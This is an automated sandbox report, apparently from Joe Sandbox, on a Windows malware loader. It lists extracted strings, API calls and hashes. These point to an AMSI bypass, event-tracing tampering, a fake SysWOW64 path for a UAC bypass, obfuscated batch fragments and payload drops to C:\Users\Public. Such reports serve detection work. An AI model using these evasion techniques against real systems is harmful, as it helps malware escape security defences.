Initialize, xrefs: 027DEDAB, 027DFCC9, 027DFE5D, 027DFFFB, 027E01A1, 027E0456, 027E0AF9, 027E0F35, 027E13DF, 027E14E9, 027E1BD0, 027E1F02, 027E2222, 027E2556, 027E2704, 027E2A5D, 027E2E16, 027E4FBE, 027E5353, 027E574F, 027E5914, 027E5B80, 027E5CBE, 027E5EC3, 027E6E38, 027E7AF0, 027E8AFD, 027E96E8, 027E9A86, 027E9FB5, 027EA36F, 027EA8BB
RtlQueryProcessDebugInformation, xrefs: 027EA0CE
smartscreenps, xrefs: 027DF4FE, 027DF531, 027DF564
CryptSIPGetSignedDataMsg, xrefs: 027DF2A7
CryptSIPGetInfo, xrefs: 027DF241
advapi32, xrefs: 027E898F
SLGatherMigrationBlob, xrefs: 027EA543
ScanBuffer, xrefs: 027DEE73, 027DF1CB, 027DF3F5, 027DF95C, 027DFA69, 027DFB81, 027DFF55, 027E00F3, 027E0299, 027E03B9, 027E054E, 027E0646, 027E08AF, 027E0A55, 027E0BF1, 027E0D07, 027E0D95, 027E10A9, 027E134A, 027E145B, 027E15F8, 027E19A3, 027E1AAF, 027E1CCD, 027E1DEA, 027E2105, 027E21A6, 027E231A, 027E24DA, 027E27FC, 027E2BF3, 027E2E92, 027E2F23, 027E32DD, 027E34BF, 027E3633, 027E37B6, 027E3832, 027E39E9, 027E3BF3, 027E3E51, 027E4083, 027E42C7, 027E450F, 027E47C5, 027E492B, 027E4AC0, 027E4DF8, 027E5132, 027E544B, 027E57CB, 027E5B04, 027E5DB6, 027E5FBB, 027E6121, 027E6295, 027E6311, 027E6EB4, 027E6F45, 027E7375, 027E7508, 027E7664, 027E775C, 027E7C79, 027E7F46, 027E80EC, 027E8279, 027E840D, 027E858C, 027E8803, 027E88FB, 027E8D17, 027E8FF0, 027E9164, 027E939A, 027E942C, 027E9764, 027E9B02, 027EA031, 027EA937
LdrGetProcedureAddress, xrefs: 027EA7A7
@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%, xrefs: 027E3361
UacScan, xrefs: 027DED47, 027DF586, 027DF67E, 027DFC4D, 027E0833, 027E0E11, 027E1773, 027E1E86, 027E3097, 027E3261, 027E33C2, 027E353B, 027E36BE, 027E388F, 027E396D, 027E3AFB, 027E4007, 027E43C4, 027E45F9, 027E52D7, 027E5847, 027E5A0C, 027E5D3A, 027E5E47, 027E60A5, 027E619D, 027E6D40, 027E70E2, 027E72F9, 027E748C, 027E76E0, 027E7B6C, 027E7CF5, 027E7E4E, 027E7FF4, 027E8181, 027E8315, 027E8494, 027E870B, 027E8B79, 027E8D93, 027E8F74, 027E90E8, 027E931E, 027EA18E
mssip32, xrefs: 027DF258, 027DF28B, 027DF2BE, 027E98BD
I_QueryTagInformation, xrefs: 027E898A
UacInitialize, xrefs: 027DEF3B, 027DF602, 027DFD45, 027E3D59, 027E41CF, 027E49C8, 027E4C84, 027E503A, 027E5527, 027E703D, 027E887F, 027E8C9B
SLGetSLIDList, xrefs: 027E95CD
CreateProcessA, xrefs: 027EA128
NtQueryInformationThread, xrefs: 027EA60F
DllRegisterServer, xrefs: 027DF001, 027DF54D
CreateProcessW, xrefs: 027EA137
SLLoadApplicationPolicies, xrefs: 027E9633
endpointdlp, xrefs: 027E9B8F, 027E9BC2, 027E9BF5, 027E9C28
kernel32, xrefs: 027EA21B, 027EA24E, 027EA281, 027EA2B4, 027EA2E7, 027EA31A, 027EA34D
DllGetClassObject, xrefs: 027DEFB0, 027DF4E7, 027E9840, 027EA510
ntdll, xrefs: 027E897B, 027E89CB, 027E89DF, 027E9D53, 027E9D86, 027E9DB9, 027E9DEC, 027E9E1F, 027EA5C0, 027EA5F3, 027EA626, 027EA659, 027EA68C, 027EA6BF, 027EA6F2, 027EA725, 027EA758, 027EA78B, 027EA7BE, 027EA7F1, 027EA824, 027EA857, 027EA88A
SxTracerGetThreadContextDebug, xrefs: 027E980D, 027EA4DD
C:\\Users\\Public\\Libraries\\, xrefs: 027E4B66, 027E4BBC, 027E58B7
EtwEventWrite, xrefs: 027EA873
EnumServicesStatusW, xrefs: 027EA0EC
TrustOpenStores, xrefs: 027DF0B0
UacUninitialize, xrefs: 027E2D1E, 027E301B, 027E3113, 027E38F1, 027E3F8B
NtAccessCheck, xrefs: 027EA741
NtReadVirtualMemory, xrefs: 027EA6DB
DlpCheckIsCloudSyncApp, xrefs: 027E9BAB
BCryptRegisterProvider, xrefs: 027DF3BC
URL=file:", xrefs: 027E64A7
EnumServicesStatusA, xrefs: 027EA0DD
dbgcore, xrefs: 027E89A3, 027E89B7
NtQueryVirtualMemory, xrefs: 027EA5DC
NtMapViewOfSection, xrefs: 027EA6A8
CreateProcessAsUserW, xrefs: 027EA155, 027EA173
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 027DFE37
sppc, xrefs: 027E95B1, 027E95E4, 027E9617, 027E964A, 027EA55A, 027EA58D
WintrustAddActionID, xrefs: 027DF0E3
NtOpenFile, xrefs: 027EA80D
EtwEventWriteEx, xrefs: 027EA840
NtWaitForSingleObject, xrefs: 027E9DA2
BCryptQueryProviderRegistration, xrefs: 027DF389
NtQueryDirectoryFile, xrefs: 027EA0BF
NtDeviceIoControlFile, xrefs: 027EA0B0
C:\Users\Public\alpha.pif, xrefs: 027E4B36
NtOpenProcess, xrefs: 027E89DA
NtOpenObjectAuditAlarm, xrefs: 027E8976
Ntdll, xrefs: 027EA0A6, 027EA0B5, 027EA0C4, 027EA0D3
NtCreateSection, xrefs: 027EA675
SetUnhandledExceptionFilter, xrefs: 027EA336
FlushInstructionCache, xrefs: 027EA303
[InternetShortcut], xrefs: 027E6498
MiniDumpWriteDump, xrefs: 027E899E
NtQuerySystemInformation, xrefs: 027EA0A1
NtAlertResumeThread, xrefs: 027E9D3C
GZmMS1j, xrefs: 027DECBC
sppwmi, xrefs: 027EA527
WriteVirtualMemory, xrefs: 027EA2D0
RetailTracerEnable, xrefs: 027E97DA
.url, xrefs: 027E54DB
WinHttp.WinHttpRequest.5.1, xrefs: 027E17E9
EnumServicesStatusExW, xrefs: 027EA10A
C:\Windows\System32\, xrefs: 027DF8B7, 027E70BB, 027E7E03
ScanString, xrefs: 027DEE0F, 027DF03A, 027DF14F, 027DF2E0, 027DF471, 027DF6FA, 027DF83B, 027DFDC1, 027E09D9, 027E0B75, 027E0FB1, 027E11CC, 027E1248, 027E1565, 027E188B, 027E1B54, 027E1F91, 027E23C2, 027E25D2, 027E2688, 027E29B7, 027E2AD9, 027E2D9A, 027E31E5, 027E3CDD, 027E4153, 027E4348, 027E4D00, 027E4E9A, 027E51DF, 027E55A3, 027E5C42, 027E6428, 027E659F, 027E6657, 027E6CC4, 027E715E, 027E75C5, 027E7BE8, 027E868F, 027E8A81, 027E8E6A, 027E9226, 027E9524, 027E98DF, 027E9CC6, 027E9EBD, 027EA467
Kernel32, xrefs: 027EA12D, 027EA13C, 027EA178
GET, xrefs: 027E1902
GetProcessMemoryInfo, xrefs: 027E9873
DlpGetWebSiteAccess, xrefs: 027E9C11
MiniDumpReadDumpStream, xrefs: 027E89B2
psapi, xrefs: 027E988A
FX.c, xrefs: 027E46FB
@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%, xrefs: 027E484E
NtGetWriteWatch, xrefs: 027EA5A9
NEO.c, xrefs: 027E4445
spp, xrefs: 027E9824, 027E9857, 027EA4F4
VirtualAlloc, xrefs: 027EA204
C:\Users\Public\, xrefs: 027E3183, 027E54D0, 027E6743
DlpGetArchiveFileTraceInfo, xrefs: 027E9BDE
FindCertsByIssuer, xrefs: 027DF116
NtWriteVirtualMemory, xrefs: 027EA7DA
NtSetSecurityObject, xrefs: 027E89C6
CreateProcessAsUserA, xrefs: 027EA146
http, xrefs: 027E15D5
SLGetEncryptedPIDEx, xrefs: 027EA576
VirtualProtect, xrefs: 027EA26A
EnumServicesStatusExA, xrefs: 027EA0FB
bcrypt, xrefs: 027DF36D, 027DF3A0, 027DF3D3, 027E99E8
HotKey=, xrefs: 027E6631
psapi, xrefs: 027EA11E
tquery, xrefs: 027E97F1
SLGetGenuineInformation, xrefs: 027E959A
DlpNotifyPreDragDrop, xrefs: 027E9B78
wintrust, xrefs: 027DF0C7, 027DF0FA, 027DF12D
LdrLoadDll, xrefs: 027EA774
OpenProcess, xrefs: 027EA29D
CryptSIPVerifyIndirectData, xrefs: 027DF274, 027E98A6
IconIndex=, xrefs: 027E64FD
ieproxy, xrefs: 027DEFC1, 027DEFE8, 027DF018
sys.thgiseurt, xrefs: 027E3ECC
lld.SLITUTEN, xrefs: 027E3AB8
EnumProcessModules, xrefs: 027EA119
SLIsGenuineLocalEx, xrefs: 027E9600
C:\\Windows \\SysWOW64\\, xrefs: 027E3ACE, 027E3EE2
C:\Users\Public\aken.pif, xrefs: 027E4B51
GetProxyDllInfo, xrefs: 027DEFD7
BCryptVerifySignature, xrefs: 027DF356, 027E99D1
DllGetActivationFactory, xrefs: 027DF51A
NtOpenSection, xrefs: 027EA642

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
API String ID: 3130226682-181751239
Opcode ID: 166f56339a35fd0609cdea8f381d47eeb9f102f77784134bac90c089190408ec
Instruction ID: f73e130893d5b4513abc85ff137bef6d50b75be5abd5aa8cc5c7d49906c6db8e
Opcode Fuzzy Hash: 166f56339a35fd0609cdea8f381d47eeb9f102f77784134bac90c089190408ec
Instruction Fuzzy Hash: 2C241E76A501198BDF12EB74CCA4ADD77BABF89310F6140EDE009A7254DB30EE868F51

Function 027E7878 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 027D8824: LoadLibraryA.KERNEL32(00000000,00000000,027D890B), ref: 027D8858
Part of subcall function 027D8824: FreeLibrary.KERNEL32(74AD0000,00000000,02821388,Function_000065D8,00000004,02821398,02821388,05F5E0FF,00000040,0282139C,74AD0000,00000000,00000000,00000000,00000000,027D890B), ref: 027D88EB

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029157DC,02915820,OpenSession,0282137C,027EAFD8,UacScan,0282137C), ref: 027E7E39
ResumeThread.KERNEL32(00000000,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,UacScan,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8), ref: 027E8483
CloseHandle.KERNEL32(00000000,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,UacScan,0282137C,027EAFD8,00000000,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C), ref: 027E8602

Part of subcall function 027D87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize,028213A4,027DA77C,UacScan), ref: 027D87B4
Part of subcall function 027D87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027D87CE
Part of subcall function 027D87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize), ref: 027D880A

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0282137C,027EAFD8,UacInitialize,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,UacScan,0282137C), ref: 027E89F4

Part of subcall function 027C7E18: GetFileAttributesA.KERNEL32(00000000,?,027DF8CC,ScanString,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanString,0282137C,027EAFD8,UacScan,0282137C,027EAFD8,UacInitialize), ref: 027C7E23

Part of subcall function 027DDACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDB9E), ref: 027DDB0B
Part of subcall function 027DDACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027DDB45
Part of subcall function 027DDACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027DDB72
Part of subcall function 027DDACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027DDB7B

Part of subcall function 027D818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,027D8216), ref: 027D81F8

ExitProcess.KERNEL32(00000000,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,Initialize,0282137C,027EAFD8,00000000,00000000,00000000,ScanString,0282137C,027EAFD8), ref: 027EAA25

Strings

FlushInstructionCache, xrefs: 027EA303
CreateProcessWithLogonW, xrefs: 027EA164
MiniDumpWriteDump, xrefs: 027E899E
NtQuerySystemInformation, xrefs: 027EA0A1
NtAlertResumeThread, xrefs: 027E9D3C
sppwmi, xrefs: 027EA527
NtQuerySecurityObject, xrefs: 027EA70E
WriteVirtualMemory, xrefs: 027EA2D0
Advapi, xrefs: 027EA0E2, 027EA0F1, 027EA100, 027EA10F, 027EA14B, 027EA15A, 027EA169
RetailTracerEnable, xrefs: 027E97DA
RtlCreateQueryDebugBuffer, xrefs: 027E9E08
OpenSession, xrefs: 027E7884, 027E79F8, 027E7A74, 027E7D71, 027E7ECA, 027E8070, 027E81FD, 027E8391, 027E8510, 027E8613, 027E8787, 027E8A05, 027E8BF5, 027E8EE6, 027E906C, 027E92A2, 027E94A8, 027E966C, 027E995B, 027E9A0A, 027E9C4A, 027E9E41, 027E9F39, 027EA3EB, 027EA9B3
EnumServicesStatusExW, xrefs: 027EA10A
RtlAllocateHeap, xrefs: 027E9D6F, 027E9DD5
C:\Windows\System32\, xrefs: 027E7E03
ScanString, xrefs: 027E797C, 027E7BE8, 027E868F, 027E8A81, 027E8E6A, 027E9226, 027E9524, 027E98DF, 027E9CC6, 027E9EBD, 027EA467
Kernel32, xrefs: 027EA12D, 027EA13C, 027EA178
GetProcessMemoryInfo, xrefs: 027E9873
VirtualAllocEx, xrefs: 027EA237
DlpGetWebSiteAccess, xrefs: 027E9C11
Initialize, xrefs: 027E7900, 027E7AF0, 027E8AFD, 027E96E8, 027E9A86, 027E9FB5, 027EA36F, 027EA8BB
RtlQueryProcessDebugInformation, xrefs: 027EA0CE
MiniDumpReadDumpStream, xrefs: 027E89B2
psapi, xrefs: 027E988A
advapi32, xrefs: 027E898F
NtGetWriteWatch, xrefs: 027EA5A9
SLGatherMigrationBlob, xrefs: 027EA543
VirtualAlloc, xrefs: 027EA204
spp, xrefs: 027E9824, 027E9857, 027EA4F4
DlpGetArchiveFileTraceInfo, xrefs: 027E9BDE
LdrGetProcedureAddress, xrefs: 027EA7A7
ScanBuffer, xrefs: 027E7C79, 027E7F46, 027E80EC, 027E8279, 027E840D, 027E858C, 027E8803, 027E88FB, 027E8D17, 027E8FF0, 027E9164, 027E939A, 027E942C, 027E9764, 027E9B02, 027EA031, 027EA937
NtWriteVirtualMemory, xrefs: 027EA7DA
CreateProcessAsUserA, xrefs: 027EA146
NtSetSecurityObject, xrefs: 027E89C6
UacScan, xrefs: 027E7B6C, 027E7CF5, 027E7E4E, 027E7FF4, 027E8181, 027E8315, 027E8494, 027E870B, 027E8B79, 027E8D93, 027E8F74, 027E90E8, 027E931E, 027EA18E
mssip32, xrefs: 027E98BD
SLGetEncryptedPIDEx, xrefs: 027EA576
I_QueryTagInformation, xrefs: 027E898A
UacInitialize, xrefs: 027E887F, 027E8C9B
CreateProcessA, xrefs: 027EA128
SLGetSLIDList, xrefs: 027E95CD
NtQueryInformationThread, xrefs: 027EA60F
CreateProcessW, xrefs: 027EA137
VirtualProtect, xrefs: 027EA26A
SLLoadApplicationPolicies, xrefs: 027E9633
endpointdlp, xrefs: 027E9B8F, 027E9BC2, 027E9BF5, 027E9C28
EnumServicesStatusExA, xrefs: 027EA0FB
kernel32, xrefs: 027EA21B, 027EA24E, 027EA281, 027EA2B4, 027EA2E7, 027EA31A, 027EA34D
DllGetClassObject, xrefs: 027E9840, 027EA510
bcrypt, xrefs: 027E99E8
ntdll, xrefs: 027E897B, 027E89CB, 027E89DF, 027E9D53, 027E9D86, 027E9DB9, 027E9DEC, 027E9E1F, 027EA5C0, 027EA5F3, 027EA626, 027EA659, 027EA68C, 027EA6BF, 027EA6F2, 027EA725, 027EA758, 027EA78B, 027EA7BE, 027EA7F1, 027EA824, 027EA857, 027EA88A
psapi, xrefs: 027EA11E
SxTracerGetThreadContextDebug, xrefs: 027E980D, 027EA4DD
EtwEventWrite, xrefs: 027EA873
EnumServicesStatusW, xrefs: 027EA0EC
tquery, xrefs: 027E97F1
NtAccessCheck, xrefs: 027EA741
NtReadVirtualMemory, xrefs: 027EA6DB
SLGetGenuineInformation, xrefs: 027E959A
DlpCheckIsCloudSyncApp, xrefs: 027E9BAB
DlpNotifyPreDragDrop, xrefs: 027E9B78
LdrLoadDll, xrefs: 027EA774
OpenProcess, xrefs: 027EA29D
EnumServicesStatusA, xrefs: 027EA0DD
CryptSIPVerifyIndirectData, xrefs: 027E98A6
NtQueryVirtualMemory, xrefs: 027EA5DC
dbgcore, xrefs: 027E89A3, 027E89B7
NtMapViewOfSection, xrefs: 027EA6A8
CreateProcessAsUserW, xrefs: 027EA155, 027EA173
sppc, xrefs: 027E95B1, 027E95E4, 027E9617, 027E964A, 027EA55A, 027EA58D
NtOpenFile, xrefs: 027EA80D
EtwEventWriteEx, xrefs: 027EA840
NtWaitForSingleObject, xrefs: 027E9DA2
NtQueryDirectoryFile, xrefs: 027EA0BF
NtDeviceIoControlFile, xrefs: 027EA0B0
EnumProcessModules, xrefs: 027EA119
NtOpenProcess, xrefs: 027E89DA
NtOpenObjectAuditAlarm, xrefs: 027E8976
SLIsGenuineLocalEx, xrefs: 027E9600
Ntdll, xrefs: 027EA0A6, 027EA0B5, 027EA0C4, 027EA0D3
BCryptVerifySignature, xrefs: 027E99D1
NtCreateSection, xrefs: 027EA675
SetUnhandledExceptionFilter, xrefs: 027EA336
NtOpenSection, xrefs: 027EA642

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 1548959583-1225450241
Opcode ID: 30c447313c56baebec3cfa08642e65c50d2004f50ce21a4bd2f831177314cb1b
Instruction ID: 0d7c28c7c9e8c7fa72ffdf0260eaedd7f6e50c1127c1f5bbfa194d485405a716
Opcode Fuzzy Hash: 30c447313c56baebec3cfa08642e65c50d2004f50ce21a4bd2f831177314cb1b
Instruction Fuzzy Hash: 7D430C76A501198BDF12EB74CDA49DD77FABF89300F6140E9E00AA7254DB30EE868F51

Function 027C1724 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,027C2000), ref: 027C17D0
Sleep.KERNEL32(0000000A,00000000,?,027C2000), ref: 027C17E6

Strings

0`, xrefs: 027C18AC, 027C18CE, 027C19D8, 027C19EE

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Sleep
String ID: 0`
API String ID: 3472027048-3339448193
Opcode ID: 265fb047e3a635c8c63cd95dc9ee959b6060f80b53cc8354afbb0dadca21092d
Instruction ID: f3ef9a80b48ae8a3dfda8eed8d1547b5e3589caa5d9a2b39191baa1cfaa3c540
Opcode Fuzzy Hash: 265fb047e3a635c8c63cd95dc9ee959b6060f80b53cc8354afbb0dadca21092d
Instruction Fuzzy Hash: D7B1027AA043518BEB15CF38D484356BBE5EB85320F688ABDD94D8B3C6D770E461CB90

Function 027C1A8C Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,027C1FE4), ref: 027C1B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,027C1FE4), ref: 027C1B31

Strings

0`, xrefs: 027C1BF4, 027C1C3E

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Sleep
String ID: 0`
API String ID: 3472027048-3339448193
Opcode ID: 730f6591b619deeed75d7d1935b4e7c333617a599ff3fceec19ba65b726c0d34
Instruction ID: 036c8875ecd74782b26f2b1733f653a2fe23e23115335f15cabc46f21662696e
Opcode Fuzzy Hash: 730f6591b619deeed75d7d1935b4e7c333617a599ff3fceec19ba65b726c0d34
Instruction Fuzzy Hash: A251AB756012408FE716CF78C988766BBE4AF45314FA885BED94C8B2C7E770D445CBA1

Function 027D870C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 027D8715

Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D

Part of subcall function 027D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D7D74

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027D8774

Strings

DllGetClassObject, xrefs: 027D873A
amsi, xrefs: 027D8710
W, xrefs: 027D8721

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
